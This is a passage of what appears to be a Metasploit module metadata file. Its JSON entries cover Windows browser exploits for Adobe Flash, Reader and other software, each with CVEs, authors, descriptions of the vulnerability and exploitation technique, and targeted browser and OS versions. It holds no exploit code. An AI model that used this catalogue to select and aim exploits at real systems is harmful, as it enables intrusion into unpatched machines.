"IE 7 on Windows XP SP3",
"IE 8 on Windows XP SP3 with msvcrt ROP",
"IE 8 on Windows XP SP3 with JRE ROP",
"IE 7 on Windows Vista",
"IE 8 on Windows 7 SP1"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb",
"is_install_path": true,
"ref_name": "windows/browser/adobe_flash_mp4_cprt",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/adobe_flash_otf_font": {
"name": "Adobe Flash Player 11.3 Kern Table Parsing Integer Overflow",
"full_name": "exploit/windows/browser/adobe_flash_otf_font",
"rank": 300,
"disclosure_date": "2012-08-09",
"type": "exploit",
"author": [
"Alexander Gavrun",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in the ActiveX component of Adobe\n Flash Player before 11.3.300.271. By supplying a specially crafted .otf font file\n with a large nTables value in the 'kern' header, it is possible to trigger an\n integer overflow, which results in remote code execution under the context of the\n user. This vulnerability has also been exploited in the wild in limited targeted\n attacks. Please note in order to ensure reliability, the exploit is forced to\n modify your URIPATH parameter to less than 3 characters, which may cause possible\n URIPATH collisions.",
"references": [
"CVE-2012-1535",
"OSVDB-84607",
"BID-55009",
"URL-http://labs.alienvault.com/labs/index.php/2012/cve-2012-1535-adobe-flash-being-exploited-in-the-wild/",
"URL-https://developer.apple.com/fonts/TTRefMan/RM06/Chap6.html",
"URL-http://contagiodump.blogspot.com.es/2012/08/cve-2012-1535-samples-and-info.html",
"URL-https://community.rapid7.com/community/metasploit/blog/2012/08/17/adobe-flash-player-exploit-cve-2012-1535-now-available-for-metasploit",
"URL-http://www.adobe.com/support/security/bulletins/apsb12-18.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
"IE 7 on Windows XP SP3",
"IE 8 on Windows XP SP3",
"IE 7 on Windows Vista SP2",
"IE 8 on Windows 7 SP1",
"IE 9 on Windows 7 SP1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/adobe_flash_otf_font.rb",
"is_install_path": true,
"ref_name": "windows/browser/adobe_flash_otf_font",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/adobe_flash_pcre": {
"name": "Adobe Flash Player PCRE Regex Vulnerability",
"full_name": "exploit/windows/browser/adobe_flash_pcre",
"rank": 300,
"disclosure_date": "2014-11-25",
"type": "exploit",
"author": [
"Mark Brand",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Adobe Flash Player. A compilation logic error\n in the PCRE engine, specifically in the handling of the \\c escape sequence when followed by\n a multi-byte UTF8 character, allows arbitrary execution of PCRE bytecode.",
"references": [
"CVE-2015-0318",
"URL-http://googleprojectzero.blogspot.com/2015/02/exploitingscve-2015-0318sinsflash.html",
"URL-https://code.google.com/p/google-security-research/issues/detail?id=199"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/adobe_flash_pcre.rb",
"is_install_path": true,
"ref_name": "windows/browser/adobe_flash_pcre",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/adobe_flash_regex_value": {
"name": "Adobe Flash Player Regular Expression Heap Overflow",
"full_name": "exploit/windows/browser/adobe_flash_regex_value",
"rank": 300,
"disclosure_date": "2013-02-08",
"type": "exploit",
"author": [
"Unknown",
"Boris \"dukeBarman\" Ryutin",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in the ActiveX component of Adobe\n Flash Player before 11.5.502.149. By supplying a specially crafted swf file\n with special regex value, it is possible to trigger a memory corruption, which\n results in remote code execution under the context of the user, as exploited in\n the wild in February 2013. This module has been tested successfully with Adobe\n Flash Player 11.5 before 11.5.502.149 on Windows XP SP3 and Windows 7 SP1 before\n MS13-063, since it takes advantage of a predictable SharedUserData in order to\n leak ntdll and bypass ASLR.",
"references": [
"CVE-2013-0634",
"OSVDB-89936",
"BID-57787",
"URL-http://malwaremustdie.blogspot.ru/2013/02/cve-2013-0634-this-ladyboyle-is-not.html",
"URL-http://malware.dontneedcoffee.com/2013/03/cve-2013-0634-adobe-flash-player.html",
"URL-http://www.fireeye.com/blog/technical/cyber-exploits/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html",
"URL-http://labs.alienvault.com/labs/index.php/2013/adobe-patches-two-vulnerabilities-being-exploited-in-the-wild/",
"URL-http://eromang.zataz.com/tag/cve-2013-0634/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-09-08 22:19:55 +0000",
"path": "/modules/exploits/windows/browser/adobe_flash_regex_value.rb",
"is_install_path": true,
"ref_name": "windows/browser/adobe_flash_regex_value",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/adobe_flash_rtmp": {
"name": "Adobe Flash Player Object Type Confusion",
"full_name": "exploit/windows/browser/adobe_flash_rtmp",
"rank": 300,
"disclosure_date": "2012-05-04",
"type": "exploit",
"author": [
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Adobe Flash\n Player. By supplying a corrupt AMF0 \"_error\" response, it\n is possible to gain arbitrary remote code execution under\n the context of the user.\n\n This vulnerability has been exploited in the wild as part of\n the \"World Uyghur Congress Invitation.doc\" e-mail attack.\n According to the advisory, 10.3.183.19 and 11.x before\n 11.2.202.235 are affected.",
"references": [
"CVE-2012-0779",
"OSVDB-81656",
"BID-53395",
"URL-http://www.adobe.com/support/security/bulletins/apsb12-09.html",
"URL-http://contagiodump.blogspot.com.es/2012/05/may-3-cve-2012-0779-world-uyghur.html",
"URL-https://community.rapid7.com/community/metasploit/blog/2012/06/22/the-secret-sauce-to-cve-2012-0779-adobe-flash-object-confusion-vulnerability"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
"IE 7 on Windows XP SP3",
"IE 8 on Windows XP SP3 with msvcrt ROP"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/adobe_flash_rtmp.rb",
"is_install_path": true,
"ref_name": "windows/browser/adobe_flash_rtmp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/adobe_flash_sps": {
"name": "Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow",
"full_name": "exploit/windows/browser/adobe_flash_sps",
"rank": 300,
"disclosure_date": "2011-08-09",
"type": "exploit",
"author": [
"Alexander Gavrun",
"Unknown",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Adobe Flash Player's Flash10u.ocx\n component. When processing a MP4 file (specifically the Sequence Parameter Set),\n Flash will see if pic_order_cnt_type is equal to 1, which sets the\n num_ref_frames_in_pic_order_cnt_cycle field, and then blindly copies data in\n offset_for_ref_frame on the stack, which allows arbitrary remote code execution\n under the context of the user. Numerous reports also indicate that this\n vulnerability has been exploited in the wild.",
"references": [
"CVE-2011-2140",
"OSVDB-74439",
"BID-49083",
"ZDI-11-276",
"URL-http://www.kahusecurity.com/2011/cve-2011-2140-caught-in-the-wild/",
"URL-http://www.adobe.com/support/security/bulletins/apsb11-21.html",
"URL-http://0x1byte.blogspot.com/2011/11/analysis-of-cve-2011-2140-adobe-flash.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
"IE 7 on Windows XP SP3 / Vista"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/adobe_flash_sps.rb",
"is_install_path": true,
"ref_name": "windows/browser/adobe_flash_sps",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/adobe_flash_uncompress_zlib_uninitialized": {
"name": "Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory",
"full_name": "exploit/windows/browser/adobe_flash_uncompress_zlib_uninitialized",
"rank": 400,
"disclosure_date": "2014-11-11",
"type": "exploit",
"author": [
"Nicolas Joly",
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits an uninitialized memory vulnerability in Adobe Flash Player. The\n vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, which fails\n to initialize allocated memory. When using a correct memory layout this vulnerability\n leads to a ByteArray object corruption, which can be abused to access and corrupt memory.\n This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 and IE11 with\n Flash 15.0.0.189.",
"references": [
"CVE-2014-8440",
"URL-https://helpx.adobe.com/security/products/flash-player/apsb14-24.html",
"URL-http://malware.dontneedcoffee.com/2014/11/cve-2014-8440.html",
"URL-http://www.verisigninc.com/en_US/cyber-security/security-intelligence/vulnerability-reports/articles/index.xhtml?id=1081"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-09-08 22:19:55 +0000",
"path": "/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized.rb",
"is_install_path": true,
"ref_name": "windows/browser/adobe_flash_uncompress_zlib_uninitialized",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/adobe_flash_worker_byte_array_uaf": {
"name": "Adobe Flash Player ByteArray With Workers Use After Free",
"full_name": "exploit/windows/browser/adobe_flash_worker_byte_array_uaf",
"rank": 500,
"disclosure_date": "2015-02-02",
"type": "exploit",
"author": [
"Unknown",
"hdarwin",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a use-after-free vulnerability in Adobe Flash Player. The\n vulnerability occurs when the ByteArray assigned to the current ApplicationDomain\n is freed from an ActionScript worker, which can fill the memory and notify the main\n thread to corrupt the new contents. This module has been tested successfully on\n Windows 7 SP1 (32-bit), IE 8 to IE 11 and Flash 16.0.0.296.",
"references": [
"CVE-2015-0313",
"URL-https://helpx.adobe.com/security/products/flash-player/apsa15-02.html",
"URL-http://hacklab.kr/flash-cve-2015-0313-%EB%B6%84%EC%84%9D/",
"URL-http://blog.trendmicro.com/trendlabs-security-intelligence/analyzing-cve-2015-0313-the-new-flash-player-zero-day/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/adobe_flash_worker_byte_array_uaf.rb",
"is_install_path": true,
"ref_name": "windows/browser/adobe_flash_worker_byte_array_uaf",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/adobe_flashplayer_arrayindexing": {
"name": "Adobe Flash Player AVM Verification Logic Array Indexing Code Execution",
"full_name": "exploit/windows/browser/adobe_flashplayer_arrayindexing",
"rank": 500,
"disclosure_date": "2012-06-21",
"type": "exploit",
"author": [
"mr_me <steventhomasseeley@gmail.com>",
"Unknown"
],
"description": "This module exploits a vulnerability in Adobe Flash Player versions 10.3.181.23\n and earlier. This issue is caused by a failure in the ActionScript3 AVM2 verification\n logic. This results in unsafe JIT(Just-In-Time) code being executed. This is the same\n vulnerability that was used for attacks against Korean based organizations.\n\n Specifically, this issue occurs when indexing an array using an arbitrary value,\n memory can be referenced and later executed. Taking advantage of this issue does not rely\n on heap spraying as the vulnerability can also be used for information leakage.\n\n Currently this exploit works for IE6, IE7, IE8, Firefox 10.2 and likely several\n other browsers under multiple Windows platforms. This exploit bypasses ASLR/DEP and\n is very reliable.",
"references": [
"CVE-2011-2110",
"OSVDB-73007",
"BID-48268",
"URL-http://www.adobe.com/devnet/swf.html",
"URL-http://www.adobe.com/support/security/bulletins/apsb11-18.html",
"URL-http://www.accessroot.com/arteam/site/download.php?view.331",
"URL-http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20110617"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb",
"is_install_path": true,
"ref_name": "windows/browser/adobe_flashplayer_arrayindexing",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/adobe_flashplayer_avm": {
"name": "Adobe Flash Player AVM Bytecode Verification Vulnerability",
"full_name": "exploit/windows/browser/adobe_flashplayer_avm",
"rank": 400,
"disclosure_date": "2011-03-15",
"type": "exploit",
"author": [
"bannedit <bannedit@metasploit.com>",
"Unknown"
],
"description": "This module exploits a vulnerability in Adobe Flash Player versions 10.2.152.33\n and earlier. This issue is caused by a failure in the ActionScript3 AVM2 verification\n logic. This results in unsafe JIT(Just-In-Time) code being executed. This is the same\n vulnerability that was used for the RSA attack in March 2011.\n\n Specifically, this issue results in uninitialized memory being referenced and later\n executed. Taking advantage of this issue relies on heap spraying and controlling the\n uninitialized memory.\n\n Currently this exploit works for IE6, IE7, and Firefox 3.6 and likely several\n other browsers. DEP does catch the exploit and causes it to fail. Due to the nature\n of the uninitialized memory its fairly difficult to get around this restriction.",
"references": [
"CVE-2011-0609",
"OSVDB-71254",
"URL-http://bugix-security.blogspot.com/2011/03/cve-2011-0609-adobe-flash-player.html",
"URL-http://www.adobe.com/devnet/swf.html",
"URL-http://www.adobe.com/support/security/advisories/apsa11-01.html",
"URL-http://www.f-secure.com/weblog/archives/00002226.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/adobe_flashplayer_avm.rb",
"is_install_path": true,
"ref_name": "windows/browser/adobe_flashplayer_avm",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/adobe_flashplayer_flash10o": {
"name": "Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability",
"full_name": "exploit/windows/browser/adobe_flashplayer_flash10o",
"rank": 300,
"disclosure_date": "2011-04-11",
"type": "exploit",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability in Adobe Flash Player that was discovered,\n and has been exploited actively in the wild. By embedding a specially crafted .swf\n file, Adobe Flash crashes due to an invalid use of an object type, which allows\n attackers to overwrite a pointer in memory, and results arbitrary code execution.\n Please note for IE 8 targets, Java Runtime Environment must be available on the\n victim machine in order to work properly.",
"references": [
"CVE-2011-0611",
"OSVDB-71686",
"BID-47314",
"URL-http://www.adobe.com/support/security/bulletins/apsb11-07.html",
"URL-http://blogs.technet.com/b/mmpc/archive/2011/04/12/analysis-of-the-cve-2011-0611-adobe-flash-player-vulnerability-exploitation.aspx",
"URL-http://contagiodump.blogspot.com/2011/04/apr-8-cve-2011-0611-flash-player-zero.html",
"URL-http://bugix-security.blogspot.com/2011/04/cve-2011-0611-adobe-flash-zero-day.html",
"URL-http://secunia.com/blog/210"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
"IE 7 on Windows XP SP3",
"IE 8 on Windows XP SP3",
"IE 7 on Windows Vista",
"IE 8 on Windows 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb",
"is_install_path": true,
"ref_name": "windows/browser/adobe_flashplayer_flash10o",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/adobe_flashplayer_newfunction": {
"name": "Adobe Flash Player \"newfunction\" Invalid Pointer Use",
"full_name": "exploit/windows/browser/adobe_flashplayer_newfunction",
"rank": 300,
"disclosure_date": "2010-06-04",
"type": "exploit",
"author": [
"Unknown",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a vulnerability in the DoABC tag handling within\n versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also\n vulnerable, as are any other applications that may embed Flash player.\n\n Arbitrary code execution is achieved by embedding a specially crafted Flash\n movie into a PDF document. An AcroJS heap spray is used in order to ensure\n that the memory used by the invalid pointer issue is controlled.\n\n NOTE: This module uses a similar DEP bypass method to that used within the\n adobe_libtiff module. This method is unlikely to work across various\n Windows versions due a hardcoded syscall number.",
"references": [
"CVE-2010-1297",
"OSVDB-65141",
"BID-40586",
"URL-http://www.adobe.com/support/security/advisories/apsa10-01.html",
"URL-http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-09-08 22:19:55 +0000",
"path": "/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb",
"is_install_path": true,
"ref_name": "windows/browser/adobe_flashplayer_newfunction",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/adobe_flatedecode_predictor02": {
"name": "Adobe FlateDecode Stream Predictor 02 Integer Overflow",
"full_name": "exploit/windows/browser/adobe_flatedecode_predictor02",
"rank": 400,
"disclosure_date": "2009-10-08",
"type": "exploit",
"author": [
"unknown",
"jduck <jduck@metasploit.com>",
"jabra"
],
"description": "This module exploits an integer overflow vulnerability in Adobe Reader and Adobe\n Acrobat Professional versions before 9.2.",
"references": [
"CVE-2009-3459",
"BID-36600",
"OSVDB-58729",
"URL-http://blogs.adobe.com/psirt/2009/10/adobe_reader_and_acrobat_issue_1.html",
"URL-http://www.adobe.com/support/security/bulletins/apsb09-15.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Adobe Reader Windows Universal (JS Heap Spray)"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb",
"is_install_path": true,
"ref_name": "windows/browser/adobe_flatedecode_predictor02",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/adobe_geticon": {
"name": "Adobe Collab.getIcon() Buffer Overflow",
"full_name": "exploit/windows/browser/adobe_geticon",
"rank": 400,
"disclosure_date": "2009-03-24",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>",
"Didier Stevens <didier.stevens@gmail.com>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat.\n Affected versions include < 7.1.1, < 8.1.3, and < 9.1. By creating a specially\n crafted pdf that a contains malformed Collab.getIcon() call, an attacker may\n be able to execute arbitrary code.",
"references": [
"CVE-2009-0927",
"OSVDB-53647",
"ZDI-09-014",
"URL-http://www.adobe.com/support/security/bulletins/apsb09-04.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Adobe Reader Universal (JS Heap Spray)"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/adobe_geticon.rb",
"is_install_path": true,
"ref_name": "windows/browser/adobe_geticon",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/adobe_jbig2decode": {
"name": "Adobe JBIG2Decode Heap Corruption",
"full_name": "exploit/windows/browser/adobe_jbig2decode",
"rank": 400,
"disclosure_date": "2009-02-19",
"type": "exploit",
"author": [
"natron <natron@metasploit.com>",
"xort",
"redsand",
"MC <mc@metasploit.com>",
"Didier Stevens <didier.stevens@gmail.com>"
],
"description": "This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier.\n This module relies upon javascript for the heap spray.",
"references": [
"CVE-2009-0658",
"OSVDB-52073",
"URL-http://www.adobe.com/support/security/bulletins/apsb09-04.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Adobe Reader v9.0.0 (Windows XP SP3 English)",
"Adobe Reader v8.1.2 (Windows XP SP2 English)"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/adobe_jbig2decode.rb",
"is_install_path": true,
"ref_name": "windows/browser/adobe_jbig2decode",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/adobe_media_newplayer": {
"name": "Adobe Doc.media.newPlayer Use After Free Vulnerability",
"full_name": "exploit/windows/browser/adobe_media_newplayer",
"rank": 400,
"disclosure_date": "2009-12-14",
"type": "exploit",
"author": [
"unknown",
"hdm <x@hdm.io>",
"pusscat <pusscat@metasploit.com>",
"jduck <jduck@metasploit.com>",
"jabra"
],
"description": "This module exploits a use after free vulnerability in Adobe Reader and Adobe Acrobat\n Professional versions up to and including 9.2.",
"references": [
"CVE-2009-4324",
"BID-37331",
"OSVDB-60980",
"URL-http://www.adobe.com/support/security/bulletins/apsb10-02.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Adobe Reader Windows English (JS Heap Spray)",
"Adobe Reader Windows German (JS Heap Spray)"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/adobe_media_newplayer.rb",
"is_install_path": true,
"ref_name": "windows/browser/adobe_media_newplayer",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/adobe_shockwave_rcsl_corruption": {
"name": "Adobe Shockwave rcsL Memory Corruption",
"full_name": "exploit/windows/browser/adobe_shockwave_rcsl_corruption",
"rank": 300,
"disclosure_date": "2010-10-21",
"type": "exploit",
"author": [
"David Kennedy \"ReL1K\" <kennedyd013@gmail.com>"
],
"description": "This module exploits a weakness in the Adobe Shockwave player's handling of\n Director movies (.DIR). A memory corruption vulnerability occurs through an undocumented\n rcsL chunk.",
"references": [
"CVE-2010-3653",
"OSVDB-68803",
"URL-http://www.adobe.com/support/security/bulletins/apsb10-25.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb",
"is_install_path": true,
"ref_name": "windows/browser/adobe_shockwave_rcsl_corruption",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/adobe_toolbutton": {
"name": "Adobe Reader ToolButton Use After Free",
"full_name": "exploit/windows/browser/adobe_toolbutton",
"rank": 300,
"disclosure_date": "2013-08-08",
"type": "exploit",
"author": [
"Soroush Dalili",
"Unknown",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits an use after free condition on Adobe Reader versions 11.0.2, 10.1.6\n and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where\n the cEnable callback can be used to early free the object memory. Later use of the object\n allows triggering the use after free condition. This module has been tested successfully\n on Adobe Reader 11.0.2 and 10.0.4, with IE and Windows XP SP3, as exploited in the wild in\n November, 2013. At the moment, this module doesn't support Adobe Reader 9 targets; in order\n to exploit Adobe Reader 9 the fileformat version of the exploit can be used.",
"references": [
"CVE-2013-3346",
"OSVDB-96745",
"ZDI-13-212",
"URL-http://www.adobe.com/support/security/bulletins/apsb13-15.html",
"URL-http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP / IE / Adobe Reader 10/11"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/adobe_toolbutton.rb",
"is_install_path": true,
"ref_name": "windows/browser/adobe_toolbutton",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/adobe_utilprintf": {
"name": "Adobe util.printf() Buffer Overflow",
"full_name": "exploit/windows/browser/adobe_utilprintf",
"rank": 400,
"disclosure_date": "2008-02-08",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>",
"Didier Stevens <didier.stevens@gmail.com>"
],
"description": "This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional\n < 8.1.3. By creating a specially crafted pdf that a contains malformed util.printf()\n entry, an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2008-2992",
"OSVDB-49520"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Adobe Reader v8.1.2 (Windows XP SP3 English)"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/adobe_utilprintf.rb",
"is_install_path": true,
"ref_name": "windows/browser/adobe_utilprintf",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/advantech_webaccess_dvs_getcolor": {
"name": "Advantech WebAccess dvs.ocx GetColor Buffer Overflow",
"full_name": "exploit/windows/browser/advantech_webaccess_dvs_getcolor",
"rank": 300,
"disclosure_date": "2014-07-17",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a buffer overflow vulnerability in Advantec WebAccess. The\n vulnerability exists in the dvs.ocx ActiveX control, where a dangerous call to\n sprintf can be reached with user controlled data through the GetColor function.\n This module has been tested successfully on Windows XP SP3 with IE6 and Windows\n 7 SP1 with IE8 and IE 9.",
"references": [
"CVE-2014-2364",
"ZDI-14-255",
"URL-http://ics-cert.us-cert.gov/advisories/ICSA-14-198-02"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb",
"is_install_path": true,
"ref_name": "windows/browser/advantech_webaccess_dvs_getcolor",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/aim_goaway": {
"name": "AOL Instant Messenger goaway Overflow",
"full_name": "exploit/windows/browser/aim_goaway",
"rank": 500,
"disclosure_date": "2004-08-09",
"type": "exploit",
"author": [
"skape <mmiller@hick.org>",
"thief <thief@hick.org>"
],
"description": "This module exploits a flaw in the handling of AOL Instant\n Messenger's 'goaway' URI handler. An attacker can execute\n arbitrary code by supplying an overly sized buffer as the\n 'message' parameter. This issue is known to affect AOL Instant\n Messenger 5.5.",
"references": [
"CVE-2004-0636",
"OSVDB-8398",
"BID-10889",
"URL-http://www.idefense.com/application/poi/display?id=121&type=vulnerabilities"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows NT/2000/XP/2003 Automatic"
],
"mod_time": "2017-09-08 22:19:55 +0000",
"path": "/modules/exploits/windows/browser/aim_goaway.rb",
"is_install_path": true,
"ref_name": "windows/browser/aim_goaway",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/aladdin_choosefilepath_bof": {
"name": "Aladdin Knowledge System Ltd ChooseFilePath Buffer Overflow",
"full_name": "exploit/windows/browser/aladdin_choosefilepath_bof",
"rank": 300,
"disclosure_date": "2012-04-01",
"type": "exploit",
"author": [
"shinnai",
"b33f",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Aladdin Knowledge System's\n ActiveX component. By supplying a long string of data to the ChooseFilePath()\n function, a buffer overflow occurs, which may result in remote code execution\n under the context of the user.",
"references": [
"OSVDB-86723",
"EDB-22258",
"EDB-22301"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows XP with IE 6",
"Windows XP with IE 7",
"Windows XP with IE 8",
"Windows Vista with IE 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb",
"is_install_path": true,
"ref_name": "windows/browser/aladdin_choosefilepath_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/amaya_bdo": {
"name": "Amaya Browser v11.0 'bdo' Tag Overflow",
"full_name": "exploit/windows/browser/amaya_bdo",
"rank": 300,
"disclosure_date": "2009-01-28",
"type": "exploit",
"author": [
"dookie, original exploit by Rob Carter"
],
"description": "This module exploits a stack buffer overflow in the Amaya v11 Browser.\n By sending an overly long string to the \"bdo\"\n tag, an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2009-0323",
"OSVDB-55721",
"BID-33046",
"BID-33047"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Amaya Browser v11"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/amaya_bdo.rb",
"is_install_path": true,
"ref_name": "windows/browser/amaya_bdo",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/aol_ampx_convertfile": {
"name": "AOL Radio AmpX ActiveX Control ConvertFile() Buffer Overflow",
